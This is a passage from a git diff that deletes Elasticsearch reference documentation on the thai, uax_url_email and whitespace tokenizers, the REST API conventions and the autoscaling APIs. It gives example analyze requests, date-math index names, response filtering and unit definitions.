Foxes, jumpe, d, over, the, lazy, dog's, bone ] ---------------------------- diff --git a/docs/reference/analysis/tokenizers/thai-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/thai-tokenizer.asciidoc deleted file mode 100644 index f1cc77c5b08..00000000000 --- a/docs/reference/analysis/tokenizers/thai-tokenizer.asciidoc +++ /dev/null @@ -1,107 +0,0 @@ -[[analysis-thai-tokenizer]] -=== Thai tokenizer -++++ -Thai -++++ - -The `thai` tokenizer segments Thai text into words, using the Thai -segmentation algorithm included with Java. Text in other languages in general -will be treated the same as the -<>. - -WARNING: This tokenizer may not be supported by all JREs. It is known to work -with Sun/Oracle and OpenJDK. If your application needs to be fully portable, -consider using the {plugins}/analysis-icu-tokenizer.html[ICU Tokenizer] instead. 
- -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "thai", - "text": "การที่ได้ต้องแสดงว่างานดี" -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "การ", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "ที่", - "start_offset": 3, - "end_offset": 6, - "type": "word", - "position": 1 - }, - { - "token": "ได้", - "start_offset": 6, - "end_offset": 9, - "type": "word", - "position": 2 - }, - { - "token": "ต้อง", - "start_offset": 9, - "end_offset": 13, - "type": "word", - "position": 3 - }, - { - "token": "แสดง", - "start_offset": 13, - "end_offset": 17, - "type": "word", - "position": 4 - }, - { - "token": "ว่า", - "start_offset": 17, - "end_offset": 20, - "type": "word", - "position": 5 - }, - { - "token": "งาน", - "start_offset": 20, - "end_offset": 23, - "type": "word", - "position": 6 - }, - { - "token": "ดี", - "start_offset": 23, - "end_offset": 25, - "type": "word", - "position": 7 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ การ, ที่, ได้, ต้อง, แสดง, ว่า, งาน, ดี ] ---------------------------- - -[discrete] -=== Configuration - -The `thai` tokenizer is not configurable. diff --git a/docs/reference/analysis/tokenizers/uaxurlemail-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/uaxurlemail-tokenizer.asciidoc deleted file mode 100644 index 4ec3a035c54..00000000000 --- a/docs/reference/analysis/tokenizers/uaxurlemail-tokenizer.asciidoc +++ /dev/null @@ -1,196 +0,0 @@ -[[analysis-uaxurlemail-tokenizer]] -=== UAX URL email tokenizer -++++ -UAX URL email -++++ - -The `uax_url_email` tokenizer is like the <> except that it -recognises URLs and email addresses as single tokens. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "uax_url_email", - "text": "Email me at john.smith@global-international.com" -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "Email", - "start_offset": 0, - "end_offset": 5, - "type": "", - "position": 0 - }, - { - "token": "me", - "start_offset": 6, - "end_offset": 8, - "type": "", - "position": 1 - }, - { - "token": "at", - "start_offset": 9, - "end_offset": 11, - "type": "", - "position": 2 - }, - { - "token": "john.smith@global-international.com", - "start_offset": 12, - "end_offset": 47, - "type": "", - "position": 3 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ Email, me, at, john.smith@global-international.com ] ---------------------------- - -while the `standard` tokenizer would produce: - -[source,text] ---------------------------- -[ Email, me, at, john.smith, global, international.com ] ---------------------------- - -[discrete] -=== Configuration - -The `uax_url_email` tokenizer accepts the following parameters: - -[horizontal] -`max_token_length`:: - - The maximum token length. If a token is seen that exceeds this length then - it is split at `max_token_length` intervals. Defaults to `255`. 
- -[discrete] -=== Example configuration - -In this example, we configure the `uax_url_email` tokenizer to have a -`max_token_length` of 5 (for demonstration purposes): - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "my_tokenizer" - } - }, - "tokenizer": { - "my_tokenizer": { - "type": "uax_url_email", - "max_token_length": 5 - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_analyzer", - "text": "john.smith@global-international.com" -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "john", - "start_offset": 0, - "end_offset": 4, - "type": "", - "position": 0 - }, - { - "token": "smith", - "start_offset": 5, - "end_offset": 10, - "type": "", - "position": 1 - }, - { - "token": "globa", - "start_offset": 11, - "end_offset": 16, - "type": "", - "position": 2 - }, - { - "token": "l", - "start_offset": 16, - "end_offset": 17, - "type": "", - "position": 3 - }, - { - "token": "inter", - "start_offset": 18, - "end_offset": 23, - "type": "", - "position": 4 - }, - { - "token": "natio", - "start_offset": 23, - "end_offset": 28, - "type": "", - "position": 5 - }, - { - "token": "nal.c", - "start_offset": 28, - "end_offset": 33, - "type": "", - "position": 6 - }, - { - "token": "om", - "start_offset": 33, - "end_offset": 35, - "type": "", - "position": 7 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following terms: - -[source,text] ---------------------------- -[ john, smith, globa, l, inter, natio, nal.c, om ] ---------------------------- diff --git a/docs/reference/analysis/tokenizers/whitespace-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/whitespace-tokenizer.asciidoc deleted file mode 100644 index 525c4bda4fa..00000000000 --- a/docs/reference/analysis/tokenizers/whitespace-tokenizer.asciidoc +++ /dev/null @@ -1,121 +0,0 @@ -[[analysis-whitespace-tokenizer]] -=== Whitespace tokenizer -++++ -Whitespace -++++ - -The `whitespace` tokenizer breaks text into terms whenever it encounters a -whitespace character. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "whitespace", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." 
-} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "The", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "2", - "start_offset": 4, - "end_offset": 5, - "type": "word", - "position": 1 - }, - { - "token": "QUICK", - "start_offset": 6, - "end_offset": 11, - "type": "word", - "position": 2 - }, - { - "token": "Brown-Foxes", - "start_offset": 12, - "end_offset": 23, - "type": "word", - "position": 3 - }, - { - "token": "jumped", - "start_offset": 24, - "end_offset": 30, - "type": "word", - "position": 4 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "word", - "position": 5 - }, - { - "token": "the", - "start_offset": 36, - "end_offset": 39, - "type": "word", - "position": 6 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "word", - "position": 7 - }, - { - "token": "dog's", - "start_offset": 45, - "end_offset": 50, - "type": "word", - "position": 8 - }, - { - "token": "bone.", - "start_offset": 51, - "end_offset": 56, - "type": "word", - "position": 9 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ The, 2, QUICK, Brown-Foxes, jumped, over, the, lazy, dog's, bone. ] ---------------------------- - -[discrete] -=== Configuration - -The `whitespace` tokenizer accepts the following parameters: - -[horizontal] -`max_token_length`:: - - The maximum token length. If a token is seen that exceeds this length then - it is split at `max_token_length` intervals. Defaults to `255`. diff --git a/docs/reference/api-conventions.asciidoc b/docs/reference/api-conventions.asciidoc deleted file mode 100644 index a0e52f86566..00000000000 --- a/docs/reference/api-conventions.asciidoc +++ /dev/null @@ -1,709 +0,0 @@ -[[api-conventions]] -== API conventions - -The *Elasticsearch* REST APIs are exposed using <>. - -The conventions listed in this chapter can be applied throughout the REST -API, unless otherwise specified. - -* <> -* <> -* <> -* <> -* <> - -[[multi-index]] -=== Multi-target syntax - -Most APIs that accept a ``, ``, or `` request path -parameter also support _multi-target syntax_. - -In multi-target syntax, you can use a comma-separated list to run a request on -multiple resources, such as data streams, indices, or index aliases: -`test1,test2,test3`. You can also use {wikipedia}/Glob_(programming)[glob-like] -wildcard (`*`) expressions to target resources that match a pattern: `test*` or -`*test` or `te*t` or `*test*`. - -You can exclude targets using the `-` character: `test*,-test3`. - -IMPORTANT: Index aliases are resolved after wildcard expressions. This can -result in a request that targets an excluded alias. For example, if `test3` is -an index alias, the pattern `test*,-test3` still targets the indices for -`test3`. To avoid this, exclude the concrete indices for the alias instead. - -Multi-target APIs that can target indices support the following query -string parameters: - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] - -The defaults settings for the above parameters depend on the API being used. 
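
As a minimal, hypothetical illustration of multi-target syntax combined with
these query string parameters (the `test*` indices are assumed to exist, and
the parameter values shown are only one possible combination), a search
request might look like this:

[source,console]
--------------------------------------------------
# Search every index matching test*, excluding test3, ignore missing
# targets, and expand wildcards to open indices only.
GET /test*,-test3/_search?ignore_unavailable=true&allow_no_indices=true&expand_wildcards=open
{
  "query": {
    "match_all": {}
  }
}
--------------------------------------------------
// TEST[skip:illustrative example with hypothetical indices]
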
- -Some multi-target APIs that can target indices also support the following query -string parameter: - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=ignore_throttled] - -NOTE: Single index APIs, such as the <> and -<>, do not support multi-target -syntax. - -[[hidden-indices]] -==== Hidden indices - -Indices that are configured to be hidden with the <> setting are -excluded from mult-target queries by default. -To include hidden indices, you must specify the `expand_wildcards` parameter. - -The backing indices for data streams are hidden indices, -and some features like {ml} store information in hidden indices. - -Global index templates that match all indices are not applied to hidden indices. - -[[system-indices]] -==== System indices - -{es} modules and plugins can store configuration and state information in internal _system indices_. -You should not directly access or modify system indices -as they contain data essential to the operation of the system. - -IMPORTANT: Direct access to system indices is deprecated and -will no longer be allowed in the next major version. - -[[date-math-index-names]] -=== Date math support in index names - -Date math index name resolution enables you to search a range of time series indices, rather -than searching all of your time series indices and filtering the results or maintaining aliases. -Limiting the number of indices that are searched reduces the load on the cluster and improves -execution performance. For example, if you are searching for errors in your -daily logs, you can use a date math name template to restrict the search to the past -two days. - -Almost all APIs that have an `index` parameter support date math in the `index` parameter -value. - -A date math index name takes the following form: - -[source,txt] ----------------------------------------------------------------------- - ----------------------------------------------------------------------- - -Where: - -[horizontal] -`static_name`:: is the static text part of the name -`date_math_expr`:: is a dynamic date math expression that computes the date dynamically -`date_format`:: is the optional format in which the computed date should be rendered. Defaults to `yyyy.MM.dd`. Format should be compatible with java-time https://docs.oracle.com/javase/8/docs/api/java/time/format/DateTimeFormatter.html -`time_zone`:: is the optional time zone. Defaults to `utc`. - -NOTE: Pay attention to the usage of small vs capital letters used in the `date_format`. For example: -`mm` denotes minute of hour, while `MM` denotes month of year. Similarly `hh` denotes the hour in the -`1-12` range in combination with `AM/PM`, while `HH` denotes the hour in the `0-23` 24-hour range. - -Date math expressions are resolved locale-independent. Consequently, it is not possible to use any other -calendars than the Gregorian calendar. - -You must enclose date math index name expressions within angle brackets, and -all special characters should be URI encoded. 
For example: - -[source,console] ----- -# PUT / -PUT /%3Cmy-index-%7Bnow%2Fd%7D%3E ----- - -[NOTE] -.Percent encoding of date math characters -====================================================== -The special characters used for date rounding must be URI encoded as follows: - -[horizontal] -`<`:: `%3C` -`>`:: `%3E` -`/`:: `%2F` -`{`:: `%7B` -`}`:: `%7D` -`|`:: `%7C` -`+`:: `%2B` -`:`:: `%3A` -`,`:: `%2C` -====================================================== - -The following example shows different forms of date math index names and the final index names -they resolve to given the current time is 22nd March 2024 noon utc. - -[options="header"] -|====== -| Expression |Resolves to -| `` | `logstash-2024.03.22` -| `` | `logstash-2024.03.01` -| `` | `logstash-2024.03` -| `` | `logstash-2024.02` -| `` | `logstash-2024.03.23` -|====== - -To use the characters `{` and `}` in the static part of an index name template, escape them -with a backslash `\`, for example: - - * `` resolves to `elastic{ON}-2024.03.01` - -The following example shows a search request that searches the Logstash indices for the past -three days, assuming the indices use the default Logstash index name format, -`logstash-yyyy.MM.dd`. - -[source,console] ----------------------------------------------------------------------- -# GET /,,/_search -GET /%3Clogstash-%7Bnow%2Fd-2d%7D%3E%2C%3Clogstash-%7Bnow%2Fd-1d%7D%3E%2C%3Clogstash-%7Bnow%2Fd%7D%3E/_search -{ - "query" : { - "match": { - "test": "data" - } - } -} ----------------------------------------------------------------------- -// TEST[s/^/PUT logstash-2016.09.20\nPUT logstash-2016.09.19\nPUT logstash-2016.09.18\n/] -// TEST[s/now/2016.09.20%7C%7C/] - -include::rest-api/cron-expressions.asciidoc[] - -[[common-options]] -=== Common options - -The following options can be applied to all of the REST APIs. - -[discrete] -==== Pretty Results - -When appending `?pretty=true` to any request made, the JSON returned -will be pretty formatted (use it for debugging only!). Another option is -to set `?format=yaml` which will cause the result to be returned in the -(sometimes) more readable yaml format. - - -[discrete] -==== Human readable output - -Statistics are returned in a format suitable for humans -(e.g. `"exists_time": "1h"` or `"size": "1kb"`) and for computers -(e.g. `"exists_time_in_millis": 3600000` or `"size_in_bytes": 1024`). -The human readable values can be turned off by adding `?human=false` -to the query string. This makes sense when the stats results are -being consumed by a monitoring tool, rather than intended for human -consumption. The default for the `human` flag is -`false`. - -[[date-math]] -[discrete] -==== Date Math - -Most parameters which accept a formatted date value -- such as `gt` and `lt` -in <>, or `from` and `to` -in <> -- understand date maths. - -The expression starts with an anchor date, which can either be `now`, or a -date string ending with `||`. This anchor date can optionally be followed by -one or more maths expressions: - -* `+1h`: Add one hour -* `-1d`: Subtract one day -* `/d`: Round down to the nearest day - -The supported time units differ from those supported by <> for durations. -The supported units are: - -[horizontal] -`y`:: Years -`M`:: Months -`w`:: Weeks -`d`:: Days -`h`:: Hours -`H`:: Hours -`m`:: Minutes -`s`:: Seconds - -Assuming `now` is `2001-01-01 12:00:00`, some examples are: - -[horizontal] -`now+1h`:: `now` in milliseconds plus one hour. 
Resolves to: `2001-01-01 13:00:00` -`now-1h`:: `now` in milliseconds minus one hour. Resolves to: `2001-01-01 11:00:00` -`now-1h/d`:: `now` in milliseconds minus one hour, rounded down to UTC 00:00. Resolves to: `2001-01-01 00:00:00` - `2001.02.01\|\|+1M/d`:: `2001-02-01` in milliseconds plus one month. Resolves to: `2001-03-01 00:00:00` - -[discrete] -[[common-options-response-filtering]] -==== Response Filtering - -All REST APIs accept a `filter_path` parameter that can be used to reduce -the response returned by Elasticsearch. This parameter takes a comma -separated list of filters expressed with the dot notation: - -[source,console] --------------------------------------------------- -GET /_search?q=kimchy&filter_path=took,hits.hits._id,hits.hits._score --------------------------------------------------- -// TEST[setup:my_index] - -Responds: - -[source,console-result] --------------------------------------------------- -{ - "took" : 3, - "hits" : { - "hits" : [ - { - "_id" : "0", - "_score" : 1.6375021 - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took" : 3/"took" : $body.took/] -// TESTRESPONSE[s/1.6375021/$body.hits.hits.0._score/] - -It also supports the `*` wildcard character to match any field or part -of a field's name: - -[source,console] --------------------------------------------------- -GET /_cluster/state?filter_path=metadata.indices.*.stat* --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n/] - -Responds: - -[source,console-result] --------------------------------------------------- -{ - "metadata" : { - "indices" : { - "my-index-000001": {"state": "open"} - } - } -} --------------------------------------------------- - -And the `**` wildcard can be used to include fields without knowing the -exact path of the field. For example, we can return the Lucene version -of every segment with this request: - -[source,console] --------------------------------------------------- -GET /_cluster/state?filter_path=routing_table.indices.**.state --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n/] - -Responds: - -[source,console-result] --------------------------------------------------- -{ - "routing_table": { - "indices": { - "my-index-000001": { - "shards": { - "0": [{"state": "STARTED"}, {"state": "UNASSIGNED"}] - } - } - } - } -} --------------------------------------------------- - -It is also possible to exclude one or more fields by prefixing the filter with the char `-`: - -[source,console] --------------------------------------------------- -GET /_count?filter_path=-_shards --------------------------------------------------- -// TEST[setup:my_index] - -Responds: - -[source,console-result] --------------------------------------------------- -{ - "count" : 5 -} --------------------------------------------------- - -And for more control, both inclusive and exclusive filters can be combined in the same expression. 
In -this case, the exclusive filters will be applied first and the result will be filtered again using the -inclusive filters: - -[source,console] --------------------------------------------------- -GET /_cluster/state?filter_path=metadata.indices.*.state,-metadata.indices.logstash-* --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\nPUT my-index-000002\nPUT my-index-000003\nPUT logstash-2016.01\n/] - -Responds: - -[source,console-result] --------------------------------------------------- -{ - "metadata" : { - "indices" : { - "my-index-000001" : {"state" : "open"}, - "my-index-000002" : {"state" : "open"}, - "my-index-000003" : {"state" : "open"} - } - } -} --------------------------------------------------- - -Note that Elasticsearch sometimes returns directly the raw value of a field, -like the `_source` field. If you want to filter `_source` fields, you should -consider combining the already existing `_source` parameter (see -<> for more details) with the `filter_path` -parameter like this: - -[source,console] --------------------------------------------------- -POST /library/book?refresh -{"title": "Book #1", "rating": 200.1} -POST /library/book?refresh -{"title": "Book #2", "rating": 1.7} -POST /library/book?refresh -{"title": "Book #3", "rating": 0.1} -GET /_search?filter_path=hits.hits._source&_source=title&sort=rating:desc --------------------------------------------------- - -[source,console-result] --------------------------------------------------- -{ - "hits" : { - "hits" : [ { - "_source":{"title":"Book #1"} - }, { - "_source":{"title":"Book #2"} - }, { - "_source":{"title":"Book #3"} - } ] - } -} --------------------------------------------------- - - -[discrete] -==== Flat Settings - -The `flat_settings` flag affects rendering of the lists of settings. When the -`flat_settings` flag is `true`, settings are returned in a flat format: - -[source,console] --------------------------------------------------- -GET my-index-000001/_settings?flat_settings=true --------------------------------------------------- -// TEST[setup:my_index] - -Returns: - -[source,console-result] --------------------------------------------------- -{ - "my-index-000001" : { - "settings": { - "index.number_of_replicas": "1", - "index.number_of_shards": "1", - "index.creation_date": "1474389951325", - "index.uuid": "n6gzFZTgS664GUfx0Xrpjw", - "index.version.created": ..., - "index.routing.allocation.include._tier_preference" : "data_content", - "index.provided_name" : "my-index-000001" - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/1474389951325/$body.my-index-000001.settings.index\\\\.creation_date/] -// TESTRESPONSE[s/n6gzFZTgS664GUfx0Xrpjw/$body.my-index-000001.settings.index\\\\.uuid/] -// TESTRESPONSE[s/"index.version.created": \.\.\./"index.version.created": $body.my-index-000001.settings.index\\\\.version\\\\.created/] - -When the `flat_settings` flag is `false`, settings are returned in a more -human readable structured format: - -[source,console] --------------------------------------------------- -GET my-index-000001/_settings?flat_settings=false --------------------------------------------------- -// TEST[setup:my_index] - -Returns: - -[source,console-result] --------------------------------------------------- -{ - "my-index-000001" : { - "settings" : { - "index" : { - "number_of_replicas": "1", - "number_of_shards": "1", - "creation_date": "1474389951325", - "uuid": "n6gzFZTgS664GUfx0Xrpjw", - "version": { - "created": ... 
- }, - "routing": { - "allocation": { - "include": { - "_tier_preference": "data_content" - } - } - }, - "provided_name" : "my-index-000001" - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/1474389951325/$body.my-index-000001.settings.index.creation_date/] -// TESTRESPONSE[s/n6gzFZTgS664GUfx0Xrpjw/$body.my-index-000001.settings.index.uuid/] -// TESTRESPONSE[s/"created": \.\.\./"created": $body.my-index-000001.settings.index.version.created/] - -By default `flat_settings` is set to `false`. - -[discrete] -[[api-conventions-parameters]] -==== Parameters - -Rest parameters (when using HTTP, map to HTTP URL parameters) follow the -convention of using underscore casing. - -[discrete] -==== Boolean Values - -All REST API parameters (both request parameters and JSON body) support -providing boolean "false" as the value `false` and boolean "true" as the -value `true`. All other values will raise an error. - -[discrete] -==== Number Values - -All REST APIs support providing numbered parameters as `string` on top -of supporting the native JSON number types. - -[[time-units]] -[discrete] -==== Time units - -Whenever durations need to be specified, e.g. for a `timeout` parameter, the duration must specify -the unit, like `2d` for 2 days. The supported units are: - -[horizontal] -`d`:: Days -`h`:: Hours -`m`:: Minutes -`s`:: Seconds -`ms`:: Milliseconds -`micros`:: Microseconds -`nanos`:: Nanoseconds - -[[byte-units]] -[discrete] -==== Byte size units - -Whenever the byte size of data needs to be specified, e.g. when setting a buffer size -parameter, the value must specify the unit, like `10kb` for 10 kilobytes. Note that -these units use powers of 1024, so `1kb` means 1024 bytes. The supported units are: - -[horizontal] -`b`:: Bytes -`kb`:: Kilobytes -`mb`:: Megabytes -`gb`:: Gigabytes -`tb`:: Terabytes -`pb`:: Petabytes - -[[size-units]] -[discrete] -==== Unit-less quantities - -Unit-less quantities means that they don't have a "unit" like "bytes" or "Hertz" or "meter" or "long tonne". - -If one of these quantities is large we'll print it out like 10m for 10,000,000 or 7k for 7,000. We'll still print 87 -when we mean 87 though. These are the supported multipliers: - -[horizontal] -`k`:: Kilo -`m`:: Mega -`g`:: Giga -`t`:: Tera -`p`:: Peta - -[[distance-units]] -[discrete] -==== Distance Units - -Wherever distances need to be specified, such as the `distance` parameter in -the <>), the default unit is meters if none is specified. -Distances can be specified in other units, such as `"1km"` or -`"2mi"` (2 miles). - -The full list of units is listed below: - -[horizontal] -Mile:: `mi` or `miles` -Yard:: `yd` or `yards` -Feet:: `ft` or `feet` -Inch:: `in` or `inch` -Kilometer:: `km` or `kilometers` -Meter:: `m` or `meters` -Centimeter:: `cm` or `centimeters` -Millimeter:: `mm` or `millimeters` -Nautical mile:: `NM`, `nmi`, or `nauticalmiles` - -[[fuzziness]] -[discrete] -==== Fuzziness - -Some queries and APIs support parameters to allow inexact _fuzzy_ matching, -using the `fuzziness` parameter. - -When querying `text` or `keyword` fields, `fuzziness` is interpreted as a -{wikipedia}/Levenshtein_distance[Levenshtein Edit Distance] --- the number of one character changes that need to be made to one string to -make it the same as another string. 
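
As a brief, hypothetical illustration (the index name `my-index-000001` and
the `message` field are made up for this sketch), a `match` query opts in to
fuzzy matching by setting `fuzziness`; the values the parameter accepts are
listed below:

[source,console]
--------------------------------------------------
# Misspelled terms can still match within the allowed edit distance.
GET /my-index-000001/_search
{
  "query": {
    "match": {
      "message": {
        "query": "quikc brown fox",
        "fuzziness": "AUTO"
      }
    }
  }
}
--------------------------------------------------
// TEST[skip:illustrative example with a hypothetical index and field]
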
- -The `fuzziness` parameter can be specified as: - -[horizontal] -`0`, `1`, `2`:: - -The maximum allowed Levenshtein Edit Distance (or number of edits) - -`AUTO`:: -+ --- -Generates an edit distance based on the length of the term. -Low and high distance arguments may be optionally provided `AUTO:[low],[high]`. If not specified, -the default values are 3 and 6, equivalent to `AUTO:3,6` that make for lengths: - -`0..2`:: Must match exactly -`3..5`:: One edit allowed -`>5`:: Two edits allowed - -`AUTO` should generally be the preferred value for `fuzziness`. --- - -[discrete] -[[common-options-error-options]] -==== Enabling stack traces - -By default when a request returns an error Elasticsearch doesn't include the -stack trace of the error. You can enable that behavior by setting the -`error_trace` url parameter to `true`. For example, by default when you send an -invalid `size` parameter to the `_search` API: - -[source,console] ----------------------------------------------------------------------- -POST /my-index-000001/_search?size=surprise_me ----------------------------------------------------------------------- -// TEST[s/surprise_me/surprise_me&error_trace=false/ catch:bad_request] -// Since the test system sends error_trace=true by default we have to override - -The response looks like: - -[source,console-result] ----------------------------------------------------------------------- -{ - "error" : { - "root_cause" : [ - { - "type" : "illegal_argument_exception", - "reason" : "Failed to parse int parameter [size] with value [surprise_me]" - } - ], - "type" : "illegal_argument_exception", - "reason" : "Failed to parse int parameter [size] with value [surprise_me]", - "caused_by" : { - "type" : "number_format_exception", - "reason" : "For input string: \"surprise_me\"" - } - }, - "status" : 400 -} ----------------------------------------------------------------------- - -But if you set `error_trace=true`: - -[source,console] ----------------------------------------------------------------------- -POST /my-index-000001/_search?size=surprise_me&error_trace=true ----------------------------------------------------------------------- -// TEST[catch:bad_request] - -The response looks like: - -[source,console-result] ----------------------------------------------------------------------- -{ - "error": { - "root_cause": [ - { - "type": "illegal_argument_exception", - "reason": "Failed to parse int parameter [size] with value [surprise_me]", - "stack_trace": "Failed to parse int parameter [size] with value [surprise_me]]; nested: IllegalArgumentException..." - } - ], - "type": "illegal_argument_exception", - "reason": "Failed to parse int parameter [size] with value [surprise_me]", - "stack_trace": "java.lang.IllegalArgumentException: Failed to parse int parameter [size] with value [surprise_me]\n at org.elasticsearch.rest.RestRequest.paramAsInt(RestRequest.java:175)...", - "caused_by": { - "type": "number_format_exception", - "reason": "For input string: \"surprise_me\"", - "stack_trace": "java.lang.NumberFormatException: For input string: \"surprise_me\"\n at java.lang.NumberFormatException.forInputString(NumberFormatException.java:65)..." 
- } - }, - "status": 400 -} ----------------------------------------------------------------------- -// TESTRESPONSE[s/"stack_trace": "Failed to parse int parameter.+\.\.\."/"stack_trace": $body.error.root_cause.0.stack_trace/] -// TESTRESPONSE[s/"stack_trace": "java.lang.IllegalArgum.+\.\.\."/"stack_trace": $body.error.stack_trace/] -// TESTRESPONSE[s/"stack_trace": "java.lang.Number.+\.\.\."/"stack_trace": $body.error.caused_by.stack_trace/] - -[discrete] -==== Request body in query string - -For libraries that don't accept a request body for non-POST requests, -you can pass the request body as the `source` query string parameter -instead. When using this method, the `source_content_type` parameter -should also be passed with a media type value that indicates the format -of the source, such as `application/json`. - -[discrete] -==== Content-Type Requirements - -The type of the content sent in a request body must be specified using -the `Content-Type` header. The value of this header must map to one of -the supported formats that the API supports. Most APIs support JSON, -YAML, CBOR, and SMILE. The bulk and multi-search APIs support NDJSON, -JSON, and SMILE; other types will result in an error response. - -Additionally, when using the `source` query string parameter, the -content type must be specified using the `source_content_type` query -string parameter. - -[[url-access-control]] -=== URL-based access control - -Many users use a proxy with URL-based access control to secure access to -{es} data streams and indices. For <>, -<>, and <> requests, the user has -the choice of specifying a data stream or index in the URL and on each individual request -within the request body. This can make URL-based access control challenging. - -To prevent the user from overriding the data stream or index specified in the -URL, set `rest.action.multi.allow_explicit_index` to `false` in `elasticsearch.yml`. - - -This causes {es} to -reject requests that explicitly specify a data stream or index in the request body. diff --git a/docs/reference/autoscaling/apis/autoscaling-apis.asciidoc b/docs/reference/autoscaling/apis/autoscaling-apis.asciidoc deleted file mode 100644 index d8f97a00771..00000000000 --- a/docs/reference/autoscaling/apis/autoscaling-apis.asciidoc +++ /dev/null @@ -1,21 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[autoscaling-apis]] -== Autoscaling APIs - -You can use the following APIs to perform autoscaling operations. - -[discrete] -[[autoscaling-api-top-level]] -=== Top-Level - -* <> -* <> -* <> -* <> - -// top-level -include::get-autoscaling-decision.asciidoc[] -include::delete-autoscaling-policy.asciidoc[] -include::get-autoscaling-policy.asciidoc[] -include::put-autoscaling-policy.asciidoc[] diff --git a/docs/reference/autoscaling/apis/delete-autoscaling-policy.asciidoc b/docs/reference/autoscaling/apis/delete-autoscaling-policy.asciidoc deleted file mode 100644 index 8708e9799a7..00000000000 --- a/docs/reference/autoscaling/apis/delete-autoscaling-policy.asciidoc +++ /dev/null @@ -1,64 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[autoscaling-delete-autoscaling-policy]] -=== Delete autoscaling policy API -++++ -Delete autoscaling policy -++++ - -Delete autoscaling policy. 
- -[[autoscaling-delete-autoscaling-policy-request]] -==== {api-request-title} - -[source,console] --------------------------------------------------- -PUT /_autoscaling/policy/my_autoscaling_policy -{ - "policy": { - "deciders": { - "fixed": { - } - } - } -} --------------------------------------------------- -// TESTSETUP - -[source,console] --------------------------------------------------- -DELETE /_autoscaling/policy/ --------------------------------------------------- -// TEST[s//my_autoscaling_policy/] - -[[autoscaling-delete-autoscaling-policy-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have -`manage_autoscaling` cluster privileges. For more information, see -<>. - -[[autoscaling-delete-autoscaling-policy-desc]] -==== {api-description-title} - -This API deletes an autoscaling policy with the provided name. - -[[autoscaling-delete-autoscaling-policy-examples]] -==== {api-examples-title} - -This example deletes an autoscaling policy named `my_autosaling_policy`. - -[source,console] --------------------------------------------------- -DELETE /_autoscaling/policy/my_autoscaling_policy --------------------------------------------------- -// TEST - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged": true -} --------------------------------------------------- diff --git a/docs/reference/autoscaling/apis/get-autoscaling-decision.asciidoc b/docs/reference/autoscaling/apis/get-autoscaling-decision.asciidoc deleted file mode 100644 index dfa14ac1806..00000000000 --- a/docs/reference/autoscaling/apis/get-autoscaling-decision.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[autoscaling-get-autoscaling-decision]] -=== Get autoscaling decision API -++++ -Get autoscaling decision -++++ - -Get autoscaling decision. - -[[autoscaling-get-autoscaling-decision-request]] -==== {api-request-title} - -[source,console] --------------------------------------------------- -GET /_autoscaling/decision/ --------------------------------------------------- -// TEST - -[[autoscaling-get-autoscaling-decision-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have -`manage_autoscaling` cluster privileges. For more information, see -<>. - -[[autoscaling-get-autoscaling-decision-desc]] -==== {api-description-title} - -This API gets the current autoscaling decision based on the configured -autoscaling policy. This API will return whether or not autoscaling is -needed. - -[[autoscaling-get-autoscaling-decision-examples]] -==== {api-examples-title} - -This example retrieves the current autoscaling decision. 
